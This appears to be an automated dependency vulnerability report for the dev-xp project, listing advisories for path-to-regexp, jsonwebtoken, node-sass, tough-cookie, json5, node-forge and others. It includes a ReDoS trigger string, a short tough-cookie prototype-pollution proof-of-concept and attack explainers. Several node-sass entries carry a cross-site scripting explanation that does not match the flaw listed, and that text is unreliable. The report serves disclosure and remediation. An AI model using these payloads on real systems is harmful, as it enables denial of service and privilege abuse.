It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade path-to-regexp
to version 0.1.12 or higher.
References
medium severity
- Vulnerable module: jsonwebtoken
- Introduced through: firebase-admin@9.12.0 and firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › jsonwebtoken@8.5.1Remediation: Upgrade to firebase-admin@11.4.1.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › jsonwebtoken@8.5.1Remediation: Upgrade to firebase-tools@11.21.0.
Overview
jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)
Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm such that the library can be misconfigured to use legacy, insecure key types for signature verification. For example, DSA keys could be used with the RS256 algorithm.
Exploitability
Users are affected when using an algorithm and a key type other than the combinations mentioned below:
EC: ES256, ES384, ES512
RSA: RS256, RS384, RS512, PS256, PS384, PS512
RSA-PSS: PS256, PS384, PS512
And for Elliptic Curve algorithms:
ES256: prime256v1
ES384: secp384r1
ES512: secp521r1
Workaround
Users who are unable to upgrade to the fixed version can use the allowInvalidAsymmetricKeyTypes
option to true
in the sign()
and verify()
functions to continue usage of invalid key type/algorithm combination in 9.0.0 for legacy compatibility.
Remediation
Upgrade jsonwebtoken
to version 9.0.0 or higher.
References
medium severity
- Vulnerable module: ip
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › proxy-agent@5.0.0 › pac-proxy-agent@5.0.0 › pac-resolver@5.0.1 › ip@1.1.9
Overview
ip is a Node library.
Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF) via the isPublic
function, which identifies some private IP addresses as public addresses due to improper parsing of the input.
An attacker can manipulate a system that uses isLoopback()
, isPrivate()
and isPublic
functions to guard outgoing network requests to treat certain IP addresses as globally routable by supplying specially crafted IP addresses.
Note
This vulnerability derived from an incomplete fix for CVE-2023-42282
Remediation
There is no fixed version for ip
.
References
medium severity
- Vulnerable module: jsonwebtoken
- Introduced through: firebase-admin@9.12.0 and firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › jsonwebtoken@8.5.1Remediation: Upgrade to firebase-admin@11.4.1.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › jsonwebtoken@8.5.1Remediation: Upgrade to firebase-tools@11.21.0.
Overview
jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)
Affected versions of this package are vulnerable to Improper Restriction of Security Token Assignment via the secretOrPublicKey
argument due to misconfigurations of the key retrieval function jwt.verify()
. Exploiting this vulnerability might result in incorrect verification of forged tokens when tokens signed with an asymmetric public key could be verified with a symmetric HS256 algorithm.
Note:
This vulnerability affects your application if it supports the usage of both symmetric and asymmetric keys in jwt.verify()
implementation with the same key retrieval function.
Remediation
Upgrade jsonwebtoken
to version 9.0.0 or higher.
References
medium severity
- Vulnerable module: node-sass
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0
Overview
node-sass is a Node.js bindings package for libsass.
Affected versions of this package are vulnerable to Denial of Service (DoS). Uncontrolled recursion is possible in Sass::Complex_Selector::perform
in ast.hpp
and Sass::Inspect::operator
in inspect.cpp
. Note: node-sass
is affected by this vulnerability due to its bundled usage of the libsass
package.
Details
A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <
can be coded as <
; and >
can be coded as >
; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <
and >
as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?
,&
,/
,<
,>
and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
There is no fixed version for node-sass
.
References
medium severity
- Vulnerable module: node-sass
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0
Overview
node-sass is a Node.js bindings package for libsass.
Affected versions of this package are vulnerable to Out-of-Bounds. A heap-based buffer over-read exists in Sass::Prelexer::parenthese_scope
in prelexer.hpp
. node-sass
is affected by this vulnerability due to its bundled usage of libsass
.
Remediation
There is no fixed version for node-sass
.
References
medium severity
- Vulnerable module: node-sass
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0
Overview
node-sass is a Node.js bindings package for libsass.
Affected versions of this package are vulnerable to Out-of-Bounds via Sass::Prelexer::alternatives
in prelexer.hpp
. Note: node-sass
is affected by this vulnerability due to its bundled usage of the libsass
package.
Details
A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <
can be coded as <
; and >
can be coded as >
; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <
and >
as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?
,&
,/
,<
,>
and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
There is no fixed version for node-sass
.
References
medium severity
- Vulnerable module: node-sass
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0
Overview
node-sass is a Node.js bindings package for libsass.
Affected versions of this package are vulnerable to Out-of-bounds Read. The function handle_error
in sass_context.cpp
allows attackers to cause a denial-of-service resulting from a heap-based buffer over-read via a crafted sass file. Note: node-sass
is affected by this vulnerability due to its bundled usage of the libsass
package.
Details
A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <
can be coded as <
; and >
can be coded as >
; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <
and >
as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?
,&
,/
,<
,>
and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
There is no fixed version for node-sass
.
References
medium severity
- Vulnerable module: request
- Introduced through: firebase-tools@9.23.3, node-sass@5.0.0 and others
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › request@2.88.2
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › request@2.88.2
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › simple-oauth2@1.6.0 › request@2.88.2
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › twitter@1.7.1 › request@2.88.2
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › universal-analytics@0.4.23 › request@2.88.2
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › node-gyp@7.1.2 › request@2.88.2
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › @npmcli/run-script@1.8.6 › node-gyp@7.1.2 › request@2.88.2
…and 4 more
Overview
request is a simplified http request client.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to insufficient checks in the lib/redirect.js
file by allowing insecure redirects in the default configuration, via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: request
package has been deprecated, so a fix is not expected. See https://github.com/request/request/issues/3142.
Remediation
A fix was pushed into the master
branch but not yet published.
References
medium severity
- Vulnerable module: tar
- Introduced through: firebase-tools@9.23.3, node-wick@4.0.3 and others
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › tar@4.4.19Remediation: Upgrade to firebase-tools@10.1.2.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-wick@4.0.3 › node-pre-gyp@0.12.0 › tar@4.4.19
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › wick-downloader@0.3.4 › node-pre-gyp@0.14.0 › tar@4.4.19
Overview
tar is a full-featured Tar for Node.js.
Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to the lack of folders count validation during the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running the software and even crash the client within few seconds of running it using a path with too many sub-folders inside.
Remediation
Upgrade tar
to version 6.2.1 or higher.
References
medium severity
- Vulnerable module: tough-cookie
- Introduced through: firebase-tools@9.23.3, node-sass@5.0.0 and others
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › request@2.88.2 › tough-cookie@2.5.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › request@2.88.2 › tough-cookie@2.5.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › simple-oauth2@1.6.0 › request@2.88.2 › tough-cookie@2.5.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › twitter@1.7.1 › request@2.88.2 › tough-cookie@2.5.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › universal-analytics@0.4.23 › request@2.88.2 › tough-cookie@2.5.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › node-gyp@7.1.2 › request@2.88.2 › tough-cookie@2.5.0
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › @npmcli/run-script@1.8.6 › node-gyp@7.1.2 › request@2.88.2 › tough-cookie@2.5.0
…and 4 more
Overview
tough-cookie is a RFC6265 Cookies and CookieJar module for Node.js.
Affected versions of this package are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false
mode. Due to an issue with the manner in which the objects are initialized, an attacker can expose or modify a limited amount of property information on those objects. There is no impact to availability.
PoC
// PoC.js
async function main(){
var tough = require("tough-cookie");
var cookiejar = new tough.CookieJar(undefined,{rejectPublicSuffixes:false});
// Exploit cookie
await cookiejar.setCookie(
"Slonser=polluted; Domain=__proto__; Path=/notauth",
"https://__proto__/admin"
);
// normal cookie
var cookie = await cookiejar.setCookie(
"Auth=Lol; Domain=google.com; Path=/notauth",
"https://google.com/"
);
//Exploit cookie
var a = {};
console.log(a["/notauth"]["Slonser"])
}
main();
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__
, constructor
and prototype
. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype
are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Object
recursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__
defined with Object.defineProperty()
, the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object
and the source of Object
as defined by the attacker. Properties are then copied on the Object
prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source)
.
lodash
and Hoek
are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue
. myValue
is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
Type | Origin | Short description |
---|---|---|
Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf ). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object . In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr) . In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin , then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true , they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype)
.Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)
), breaking the prototype chain and preventing pollution.As a best practice use
Map
instead ofObject
.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade tough-cookie
to version 4.1.3 or higher.
References
medium severity
- Vulnerable module: json5
- Introduced through: babel-core@6.26.3 and rollup-plugin-vue@4.7.2
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › json5@0.5.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › generic-names@1.0.3 › loader-utils@0.2.17 › json5@0.5.1
Overview
Affected versions of this package are vulnerable to Prototype Pollution via the parse
method , which does not restrict parsing of keys named __proto__
, allowing specially crafted strings to pollute the prototype of the resulting object. This pollutes the prototype of the object returned by JSON5.parse
and not the global Object prototype (which is the commonly understood definition of Prototype Pollution). Therefore, the actual impact will depend on how applications utilize the returned object and how they filter unwanted keys.
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__
, constructor
and prototype
. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype
are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Object
recursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__
defined with Object.defineProperty()
, the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object
and the source of Object
as defined by the attacker. Properties are then copied on the Object
prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source)
.
lodash
and Hoek
are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue
. myValue
is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
Type | Origin | Short description |
---|---|---|
Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf ). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object . In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr) . In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin , then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true , they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype)
.Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)
), breaking the prototype chain and preventing pollution.As a best practice use
Map
instead ofObject
.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade json5
to version 1.0.2, 2.2.2 or higher.
References
medium severity
- Vulnerable module: jsonwebtoken
- Introduced through: firebase-admin@9.12.0 and firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › jsonwebtoken@8.5.1Remediation: Upgrade to firebase-admin@11.4.1.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › jsonwebtoken@8.5.1Remediation: Upgrade to firebase-tools@11.21.0.
Overview
jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)
Affected versions of this package are vulnerable to Improper Authentication such that the lack of algorithm definition in the jwt.verify()
function can lead to signature validation bypass due to defaulting to the none
algorithm for signature verification.
Exploitability
Users are affected only if all of the following conditions are true for the jwt.verify()
function:
A token with no signature is received.
No algorithms are specified.
A falsy (e.g.,
null
,false
,undefined
) secret or key is passed.
Remediation
Upgrade jsonwebtoken
to version 9.0.0 or higher.
References
medium severity
- Vulnerable module: node-forge
- Introduced through: firebase-admin@9.12.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › node-forge@0.10.0Remediation: Upgrade to firebase-admin@10.0.2.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Prototype Pollution via the forge.debug
API if called with untrusted input.
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__
, constructor
and prototype
. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype
are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Object
recursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__
defined with Object.defineProperty()
, the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object
and the source of Object
as defined by the attacker. Properties are then copied on the Object
prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source)
.
lodash
and Hoek
are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue
. myValue
is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
Type | Origin | Short description |
---|---|---|
Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf ). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object . In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr) . In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin , then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true , they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype)
.Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)
), breaking the prototype chain and preventing pollution.As a best practice use
Map
instead ofObject
.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade node-forge
to version 1.0.0 or higher.
References
medium severity
- Vulnerable module: vue-template-compiler
- Introduced through: vue-template-compiler@2.7.16
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › vue-template-compiler@2.7.16
Overview
